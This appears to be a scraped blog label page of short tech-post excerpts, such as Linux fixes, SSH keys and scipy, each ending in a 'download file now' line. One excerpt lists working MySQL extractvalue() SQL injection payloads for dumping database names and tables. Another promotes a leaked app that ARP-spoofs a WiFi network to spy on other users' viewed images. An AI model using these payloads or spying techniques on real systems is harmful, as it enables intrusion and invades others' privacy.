Posts

Showing posts with the label using

Solved Desktop Freeze When Editing Documents Using Libreoffice in Lubuntu LXDE

Image
Solved Desktop Freeze When Editing Documents Using Libreoffice in Lubuntu LXDE Lubuntu 11.10 using lxpanel and tint2 LXDE is a new but suddenly being popular desktop environment in Linux world. It uses openbox as the window manager, so it is lightweight and runs fast in any low hardware PCs or laptops. Not long time later, born Lubuntu, an Ubuntu based distro that uses LXDE as the desktop environment. Then Lubuntu 10.10, 11.10 and 11.10 regularly released and since 11.04, Lubuntu has been recognized as a new Ubuntu derivative. Overall, Lubuntu has no important notice about bugs, except one bug in Lubuntu 11.10. If we edit documents by Libreoffice and then save it, the desktop will be frozen. After google about this bug, I found the solving. This bug caused by Task Bar (Window List) applet of lxpanel (LXDE panel). To solve this problem is very easy, these are the steps : Remove Task Bar (Window List) applet in lxpanel by right clicking at the lxpanel>Panel Settings>Panel Appl...

SOLVED apache2 Could not reliably determine the servers fully qualified domain name using 127 0 1 1 for ServerName on Xubuntu

SOLVED apache2 Could not reliably determine the servers fully qualified domain name using 127 0 1 1 for ServerName on Xubuntu Symptom You get this error message when starting apache: * Starting web server apache2 apache2: Could not reliably determine the servers fully qualified domain name, using 127.0.1.1 for ServerName Fix Open a terminal window and run: sudo sh -c echo "ServerName localhost" >> /etc/apache2/conf.d/name && sudo service apache2 restart References How to fix Apache � "Could not reliably determine the server�s fully qualified domain name, using 127.0.1.1 for ServerName" Error on Ubuntu download file now

Speed Up Your Browsing Experience By Using Public DNS Servers

Image
Speed Up Your Browsing Experience By Using Public DNS Servers Did you know that configuring your DNS Server Addresses can block sites with pornographic content , sites that has hosting malware, phishing schemes, and scams. it can also speed up your browsing experience with no Pop-ups and improve your security by parental control. What Does DNS Mean? The DNS protocol is an important part of the webs infrastructure, serving as the Internets phone book: every time you visit a website, your computer performs a DNS lookup. Complex pages often require multiple DNS lookups before they start loading, so your computer may be performing hundreds of lookups a day. Click Here for information about Domain Name System . Configure your network Settings Using TCP/IP Lan Properties: Sample Setup Using Google Public DNS Server . Click OK Note: Checked "Obtain An IP Address Automatically" or you can use your own configured IP Address such like "192.168.0.1 - 192.168.0.100" ^_^ Here ar...

Solved Finding computer name using IP

Image
Solved Finding computer name using IP Windows: nbtstat -a ipaddress Linux: nmblookup -A� ipaddress download file now

Spy on all Images Being Viewed on a WiFi NetworK using your android device

Spy on all Images Being Viewed on a WiFi NetworK using your android device Hi everyone! This is my new addition to the Wifi Hacking Community. Like most people who are into wifi hacking then you are familiar with a tool called driftnet . This tool when combined with arpspoof will allow you to see most images being viewed by other members on the same network! This is a neat tool for spying on other people and seeing what images they are viewing! Pr0nz much? I purchased this tool but am leaking it for you members here so you can experience it for yourself! NOTE: REQUIRES ROOT! FYI this will slightly bog down the network. Unfortunately it spoofs the whole network and not just one target you specify. Here is the APK - Piik.apk It is called Piik or (Peek). I hope you guys enjoy this app as much as I do! HEADS UP! I am currently working on making my own Binary for Ettercap port to Android that actually supports IPTABLES and SSL Spoofing! Stay tuned! download  file  now

SSH using Public Key Authentication

SSH using Public Key Authentication Lately, Ive been implementing a solution to make SSH connections more secure and manageable (i.e., getting away from password authentication). A couple of benefits public-key authentication has over the default password authentication is: You only have to remember the passphrase of your private key rather than possibly dozens of username/password combinations for remote hosts. A password sent across the network, even protected by an SSH secure channel, can be captured when it arrives on the remote host if that host has been compromised. # Generate the Key Pair RSA authentication will need a passphrase to encrypt the private key. It is highly recommended to create a strong passphrase for the private key. A strong passphrase is at least 10 - 15 characters long and not a grammatical sentence. The following command creates a 4096-bit RSA key pair and prompts you for a passphrase: $ ssh-keygen -t rsa -b 4096 Generating public/private rsa key pair. Enter f...

Solaris using pmap to identify shared and private memory of a process

Solaris using pmap to identify shared and private memory of a process The Solaris operating system contains a number of nice commands to explore the status of processes. They all access the process details maintained in the process directory /proc . In this article Ill take a look into the pmap command (the link pointing to the current Solaris documentation at Oracle who inherited Solaris after acquiring Sun Microsystems) which allows to investigate the process memory layout in various ways (refer to the link for examples). A user can investigate his own processes, the root user can investigate any process. pmap output for one process In the first part of the discussion I will look into the pmap details of one process . As one can see from the output below pmap can answer those questions: How much shared and private memory is a process using? Which components are using how much memory? One could identify libraries or the stack or whatever to be a memory eater. I am using the ...

SQL injection exploitation using XPath injection

SQL injection exploitation using XPath injection Pranaam to all bhai ji _/_ Today i am going to share XPath injection payloads for SQL injection exploitation. we will use extractvalue() of SQL which is XML function. so lets start... First of all, necessary condition is, vulnerable application should display MySQL server error in case query is wrong. means, when you add , " or in parameter, application should display MySQL error. Payload for extracting SQL user ====================== and extractvalue(6678,concat(0x7e,(select  user() ),0x7e ))-- - Payload for extracting database name ========================= and extractvalue(6678,concat(0x7e,(select  database() ),0x7e ))-- - Payload for extracting Table name ======================= Below payload will extract first table name from current table name and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - for extraction of next table name ...

Solving a Linear Systes of Equations Using python

Image
Solving a Linear Systes of Equations Using python Solving linear systems of equations is straightforward using the scipy command linalg.solve . This command expects an input matrix and a right-hand-side vector. The solution vector is then computed. An option for entering a symmetrix matrix is offered which can speed up the processing when applicable. As an example, suppose it is desired to solve the following simultaneous equations: We could find the solution vector using a matrix inverse: However, it is better to use the linalg.solve command which can be faster and more numerically stable. In this case it however gives the same answer as shown in the following example: >>> import numpy as np >>> from scipy import linalg >>> A = np . array ([[ 1 , 2 ],[ 3 , 4 ]]) >>> A array([[1, 2], [3, 4]]) >>> b = np . array ([[ 5 ],[ 6 ]]) >>> b array([[5], [6]]) >>> linalg . inv ( A ) . dot ( b ) #slow array([[-4. ], ...

Step by Step Guides On How to Create a Personalized SFX Archieve in Winrar Using HTML and ResHacker Software

Image
Step by Step Guides On How to Create a Personalized SFX Archieve in Winrar Using HTML and ResHacker Software To Create a Modified SFX Archieve you Must have Winrar Then a Personalized ICON and LOGO for your installer. If you don�t have an iCon for your Installer I give you a Tips to Hack others Application icons in Easy Way. To hack other application iCon�s you Must Download ResHacker Software to edit exe files. See the image for Better Guide: Now you have a personalized icon lol� * Edit you Installer LOGO by knowing the Size width and Height and save this as your Guide for latter use. * Pack All your files for Installing, 1. Right click on Selected Files ("Files to be Installed") then select Add to Archieve. 2. In General tab �Name your file� and checked �Create a SFX Achieve� 3. In Advanced Tab click �SFX Option � 4. Edit your Advance SFX option �Text and Icon� � Title of SFX � Text to display in SFX window ( Can be Done Using HTML language) � Browse your SFX logo and icon....

Still remember last time when using nvidia geforce2 to play dota the revolution of graphic card of my pc

Still remember last time when using nvidia geforce2 to play dota the revolution of graphic card of my pc During my degree times, I got a Intel Celeron CPU with Nvidia geforce 2 Quadro graphic card and a total of 384mb sdram for me to play game and do my assignment. But most of the time its being used for gaming purpose. Dota this game was introduced by one of my friend, Ken. I copied the dota map and put into my warcraft III download folder and play LAN game with my friend. After that slowly move to battlenet and play at Blueserver. Still remember I really quite confuse with the equipment combination and was very noob. Nvidia geforce2 Quadro is my first graphic card and its been used from diploma to my degree times. Still remember last time when I play warcarft III or dota, before that I will need to set the graphic options all to the lowest setting. This is because the graphic card is not that good and will cause lagness if I set to better graphic setting. Poor graphic card is the mai...

Start your first program in Linux using a nice IDE Geany Ubuntu 14 04

Image
Start your first program in Linux using a nice IDE Geany Ubuntu 14 04 In Previos post i had written about how to work with codeblocks in ubuntu 14.04. Now i have found another nice IDE name �Geany�. Now i will discuss about how to install and work with it. Using this you can work with C, C++, Java, JavaScript, PHP, HTML, CSS, Python, Perl, Ruby, Pascal and Haskell. Read more � download  file  now

Solve This disk is write protected using CMD

Image
Solve This disk is write protected using CMD Hello Friends , Back with a new trick Sometimes when you want to format your Pen-drive it comes up with an error and Windows will tell you it is  Write Protected . So, today Im going to share a very simple method to Format the Pen-drive by using cmd. JUST FOLLOW THESE STEPS - 1.  Insert  your Pen-drive in USB Port 2.  Now  Note down the Letter  associated with your removal disk ( Pen-drive ) eg -  F:  as shown above 3. Now Click on  START   4. Type  cmd  in search Box and Hit  ENTER  ( Win 7 & 8 )   For Win XP - Start > Run > Type cmd > Hit enter 5. A box will open when you hit ENTER 6. Now type  Format F:  ( with Colon - Two dots ) and Press ENTER [ If you want to Format it as FAT32  then type -  Format F: /FS: FAT32  ] 7. Just wait for 10 min and Its Done. [ Note - Please write the Letter Associated with your Pen-drive instead of...

SQL Fetching Record One by One without using Cursor

SQL Fetching Record One by One without using Cursor --Fetching Record One-by-One without using Cursor DECLARE @EMP_ID CHAR( 11 ) SET ROWCOUNT 0 SELECT * INTO #MYTEMP FROM Employee SET ROWCOUNT 1 SELECT @EMP_ID = EMP_ID FROM #Employee WHILE @@ROWCO download  file  now

Speed Up your apt get Downloads by using apt fast

Speed Up your apt get Downloads by using apt fast apt-fast is a simple command line application which makes use of the Axel HTTP/FTP download accelerator and speeds up the download process by making use of multiple sources for one file. The author claims that it can speed up the whole process as much as 26 times. It is now available via a Launchpad PPA. For installation, go to a Terminal and run: sudo add-apt-repository ppa:tldm217/tahutek.net sudo apt-get update sudo apt-get install apt-fast Once installed, you just need to replace apt-get to apt-fast in your command syntax for example: sudo apt-fast update sudo apt-fast upgrade sudo apt-fast install package-name If there is no noticeable difference in the speeds, make sure youve selected the best download server for your downloads. Take a look at the link below: Select the best server for Updates and Installs download file now

Spam Alert Companies or Persons using whatrevitwants in Spam email campaigns

Image
Spam Alert Companies or Persons using whatrevitwants in Spam email campaigns Hi everyone, just a note that I am not an Indian based web design person or company. Please report as spam any email that you get that resembles the following: Thanks and have a great day :) download file now

Stop playback in HTML5 audio using Javascript

Stop playback in HTML5 audio using Javascript You may wanted to stop playback of an audio playing via audio   HTML5  tag. Here is the code : document.getElementById(audio).currentTime = 0;//By ID document.getElementsByTagName(audio).currentTime = 0;//By Tag Its that simple. Just use  currentTime = 0 . download  file  now

Steps to create open and close an Oracle Wallet using Oracle Wallet Manager

Image
Steps to create open and close an Oracle Wallet using Oracle Wallet Manager Its possible to create the Oracle Wallet using the owm gui utility or from sqlplus with a new set of key management statements (ADMINISTER KEY MANAGEMENT). Lets see first in this post how to proceed using the owm gui utility. Using the Oracle Wallet Manager its possible to create standard wallets (PKCS #12, Public-Key Cryptography Standards) on file system or wallets (PKCS #11) used in conjunction of hardware security modules (HSM), tokens or smart cards. From the command line type: [oracle@vsi08devpom ~]$ owm & The following screenshot appears: To create a new wallet from the Wallet menu select New . If the Oracle software detects you dont have a default directory for the wallet it will ask you to create one: you can always choose a custom directory. The default path of the wallet directory is: $ORACLE_HOME/owm/wallets/user_name (/app/oracle/product/12.1.0/dbhome_1/owm/wallets/oracle in my case).   ...

Step by step guide to installing CM 10 1 on HTC One X using Ubuntu

Step by step guide to installing CM 10 1 on HTC One X using Ubuntu While I think the HTC One X is a great bit of hardware I find HTCs changes to Android a little annoying.  I use Nexus devices for my day to day use and find the more pure Android implementation provided by Google much better and generally more attractive than the HTC version.  Fortunately you can use CyanogenMod to get an experience much closer to Android the way Google intended it.  In this guide I will be installing CyanogenMod 10.1 which is based on Android 4.2.2(the latest version at the time of writing). DISCLAIMER: as usual with all these types of guides it may void the warranty and I am not responsible for any damage you may cause to your phone.  I tested this with Ubuntu Gnome 13.04 and a UK O2 HTC One X with Android 4.1.1.  This process is going to wipe all the data off your phone so make sure everything important is synced and backed up first. The following is a step by step guide to in...

Storing Multi line commands in history using shopt

Storing Multi line commands in history using shopt It is hard to reuse multi-line commands as the newlines are replaced by semicolon and the many line command is converted to a single line. For example: for i in $( ls *.txt) do pwd echo $i cp $i /bin done After executing it, when you press up button to reuse it, the command becomes: for i in $( ls *.txt); do pwd; echo $i; cp $i /bin; done Forget about reusing, I cant even understand what it does when so many things are stuffed in one line! I found a way using which it is possible to retain the newlines in history using shopt . shopt -s lithist Now when you press up button you will see the command in multiple lines! win! If you want this to be enabled by default add " shopt -s lithist " at the end of file ~/.bashrc UPDATE Also multi-line commands are screwed up when you add comments. For example for i in $(ls) do echo "a" #echo $i done becomes for i in $(ls); do echo "a" done (note that there is no semico...